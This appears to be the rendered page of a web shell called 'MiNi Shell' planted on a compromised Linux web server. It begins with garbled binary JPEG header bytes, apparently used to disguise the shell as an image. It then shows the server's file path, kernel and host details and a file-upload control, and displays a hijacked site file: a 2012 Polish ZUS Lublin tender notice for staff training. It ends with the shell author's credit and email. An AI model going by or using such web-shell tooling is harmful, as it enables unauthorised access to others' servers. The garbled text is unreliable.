JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120913/345486-N-2012.html

<p class="kh_header"><b>Lublin: Usługa szkoleniowa  dla  pracowników  Oddziału ZUS  w Lublinie</b><br>
<b>Numer ogłoszenia: 345486 - 2012; data zamieszczenia: 13.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa  dla  pracowników  Oddziału ZUS  w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia, o wartości szacunkowej poniżej 130 tys. euro,  jest usługa szkoleniowa obejmująca organizację  i przeprowadzenie szkoleń dla pracowników Oddziału ZUS w Lublinie, związanych z branżą uczestników szkolenia         i finansowanych w całości ze środków publicznych.  Przedmiot zamówienia obejmuje  2  niżej opisane zadania: 

1.1.  Zadanie 1  pn. >Techniki efektywnego rozwiązywania problemów<
- uczestnicy szkolenia: kadra kierownicza,
- termin szkolenia : do 30 listopada 2012 r., 
- miejsce szkolenia: Lublin - miejsce zaproponowane i opłacone przez wykonawcę usługi,
- ilość uczestników: ok. 64 osób,  
- ilość grup szkoleniowych:  5 grup szkoleniowych, nie więcej niż 15 osób w grupie. Zamawiający dopuszcza możliwość realizowania szkoleń dla więcej niż jednej grupy równocześnie (tj. w tym samym terminie), przy założeniu, ze każda grupa szkolona byłaby przez innego trenera i w innej sali szkoleniowej.
- czas trwania szkolenia: 16 godzin dydaktycznych (16 x 45 minut) tj. 2 dni robocze,
- forma szkolenia: 60 % warsztaty, pozwalające na praktyczne ćwiczenie wybranych umiejętności,  40% treści teoretyczne. 
- Wykonawca zobowiązany jest zapewnić w ramach ceny ofertowej dla wszystkich uczestników szkolenia catering (w przerwach  kawowych  i obiadowych), materiały szkoleniowe oraz certyfikat ukończenia szkolenia

  1.2. Zadanie 2  pn.  >Asertywność w obsłudze klienta<
- uczestnicy szkolenia: pracownicy komórek obsługi klientów i korespondencji - front Office,
- termin szkolenia : do 21  grudnia 2012 r.,
- miejsce szkolenia: Lublin i Radzyń Podlaski (6grup w Lublinie, 2 grupy w Radzyniu Podlaskim)-   miejsca zaproponowane i opłacone przez wykonawcę usługi,
-  ilość uczestników: ok. 108  osób,  
- ilość grup szkoleniowych:  8 grup szkoleniowych, nie więcej niż 15 osób w grupie. Zamawiający dopuszcza możliwość realizowania szkoleń dla więcej niż jednej grupy równocześnie (tj. w tym samym terminie), przy założeniu, ze każda grupa szkolona byłaby przez innego trenera i w innej sali szkoleniowej.
-  czas trwania szkolenia: 16 godzin dydaktycznych (16 x 45 minut) tj. 2 dni robocze, 
- forma szkolenia: 60 % warsztaty, pozwalające na praktyczne ćwiczenie wybranych umiejętności,  40% treści teoretyczne. 
- Wykonawca zobowiązany jest zapewnić w ramach ceny ofertowej dla wszystkich uczestników szkolenia catering (w przerwach  kawowych  i obiadowych), materiały szkoleniowe oraz certyfikat ukończenia szkolenia;

2.Szczegółowy opis przedmiotu zamówienia zawarty jest w Specyfikacji Istotnych Warunków Zamówienia (SIWZ);

3.WSPÓLNY SŁOWNIK ZAMÓWIEŃ:  Kody CPV:  80500000-9 Usługa szkoleniowa;

4.Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7 lub art. 134 ust. 6 pkt 3 i 4 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych  ( Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.),  zwanej dalej ustawą;
     
5.Wymagany termin wykonania zamówienia: zadanie  1 - nie później niż do 30.11.2012r.; zadanie 2 - nie później niż do 21.12.2012r. (zgodnie ze szczegółowym harmonogramem przedstawionym przed datą zawarcia umowy przez wybranego  Wykonawcę   i  zaakceptowanym przez Zamawiającego)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium  w kwocie  2 000,00 zł (dwa tysiące zł).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział wykonawcy, którzy  wykonali  należycie w okresie ostatnich trzech  lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,   co najmniej 2.  usługi  (każda na podstawie odrębnej umowy)  w zakresie niezbędnym do wykazania wiedzy  i doświadczenia   w każdym zadaniu,  tj. co najmniej 2 usługi szkoleniowe o tematyce  objętej zadaniem 1  i co najmniej 2. usługi szkoleniowe o tematyce objętej zadaniem 2.   dla grupy szkoleniowej  liczącej co najmniej 15 osób .   Na potwierdzenie spełnienia tego warunku Wykonawca złoży wykaz usług  (wg wzoru załączonego do SIWZ -  załącznik nr  4) spełniających powyższy opis  z podaniem ich rodzaju  i wartości oraz daty i miejsca wykonywania  a także załączy dokumenty  potwierdzające, że usługi  zawarte  w wykazie zostały wykonane  należycie.  (W przypadku oferty wspólnej  spełnianie tego warunku będzie oceniane łącznie przez wszystkich wspólników, co oznacza, że wystarczy spełnienie warunku na każde zadanie  przez jednego ze wspólników),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział wykonawcy, którzy dysponują co najmniej 2.  osobami zdolnymi do wykonania zamówienia (trenerami) posiadającymi co najmniej 2. letnie doświadczenie  w prowadzeniu szkoleń dotyczących tematyki zamówienia (lub podobnej)  oraz posiadającymi   co najmniej wykształcenie wyższe magisterskie.  Na potwierdzenie  spełniania tego warunku każdy wykonawca załączy do oferty  wykaz trenerów (wg wzoru załączonego do SIWZ- załącznik nr 5) zawierający również informacje dotyczące ich  kwalifikacji zawodowych, doświadczenia  i wykształcenia wraz z informacją o sposobie dysponowania tymi osobami.  (W przypadku oferty wspólnej  spełnianie tego warunku będzie oceniane łącznie przez wszystkich wspólników , co oznacza, że liczba  trenerów, którymi dysponują łącznie wszyscy wspólnicy musi być równa co najmniej  2),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku oferty wspólnej -  brak podstaw do wykluczenia, musi wykazać  każdy ze wspólników poprzez złożenie dokumentów,   o których mowa w pkt. III.4.2;
2. Niezależnie od  dokumentów wymienionych w pkt. III.4.1,  Wykonawca zobowiązany jest złożyć oświadczenie, że spełnia warunki zawarte w art. 22 ust. 1 ustawy - według załącznika  nr 2 do SIWZ ( w przypadku oferty wspólnej oświadczenie składa pełnomocnik wykonawcy;   przy  czym  pełnomocnictwo powinno być dołączone do oferty);
3. Jeżeli  w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o których mowa w pkt. III.4.3.1, wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione  z  datą wymaganą  dla tych dokumentów (6 miesięcy przed upływem terminu składania ofert); 
4.  Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. w ramach konsorcjum), ustanawiają  pełnomocnika do reprezentowania ich  w postępowaniu albo reprezentowania   w postępowaniu  i zawarciu umowy  w sprawie zamówienia publicznego  i składając  jedną ofertę dołączają  do niej pełnomocnictwo dla wspólnika reprezentującego wykonawcę;
5. Jeżeli  wykonawca nie spełnia samodzielnie warunków udziału w postępowaniu  a  wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy  polega na zasobach (wiedzy i  doświadczeniu , potencjale  technicznym, osobach  zdolnych do wykonania zamówienia lub zdolnościach finansowych)  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy,  zobowiązany jest udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności załączając  do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>określono w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ZUS Oddział w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 914 - budynek  38C.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IX, pok. 
38C..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.  SIWZ  zamieszczona będzie na stronie internetowej  Zamawiającego: www.zus.pl od dnia zamieszczenia  ogłoszenia  w Biuletynie Zamówień Publicznych (ogłoszenie będzie opublikowane w dniu  13.09.2012r.  na portalu UZP)  do upływu terminu składania ofert;

2.  SIWZ w wersji papierowej /bezpłatna/  można odebrać  osobiście w siedzibie Zamawiającego, ZUS Oddział w Lublinie, 20-601 Lublin,  ul. T. Zana 38C , piętro IX,  pokój   nr 914 - budynek  38C  lub otrzymać  pocztą;

3. Pracownikiem   uprawnionym  do kontaktów z wykonawcami  jest  Włodzimierz Koczkodaj tel/fax: (81) 535-77-94;

4.   Otwarcie ofert nastąpi w dniu  24.09.2012r.   o godzinie 12:30 w siedzibie
               Zamawiającego, piętro IX, pok. 914-budynek  38C;

5.   Ustanawianie dynamicznego systemu zakupów - nie dotyczy niniejszego zamówienia; 

6.  Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia,  o których mowa w art. 151a ustawy;

7.  Zamawiający nie przewiduje wymagań związanych z realizacją zamówienia (o których mowa   w art. 29 ust. 4 ustawy), tj. dotyczących zatrudnienia osób bezrobotnych   i młodocianych w celu przygotowania zawodowego, niepełnosprawnych i innych, o których mowa w przepisach                                o zatrudnieniu socjalnym lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego; 

8. Zamawiający ustala faksową (nr faksu: 81 535-77-94) formę przekazywania informacji,  oświadczeń, wniosków, zawiadomień; przy czym każda ze stron, na żądanie drugiej, potwierdzi niezwłocznie fakt otrzymania korespondencji. W przypadku braku możliwości komunikacji faksowej  dopuszcza się formę elektroniczną (koczkodajw@zus.pl). Niezależnie od powyższego ustalenia zawsze dopuszczalna jest forma pisemna z zastrzeżeniem wyjątków przewidzianych w ustawie.   W zakresie  określonym ustawą, Zamawiający będzie zamieszczał  dokumenty i informacje dotyczące niniejszego postępowania  na stronie internetowej   www.zus.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com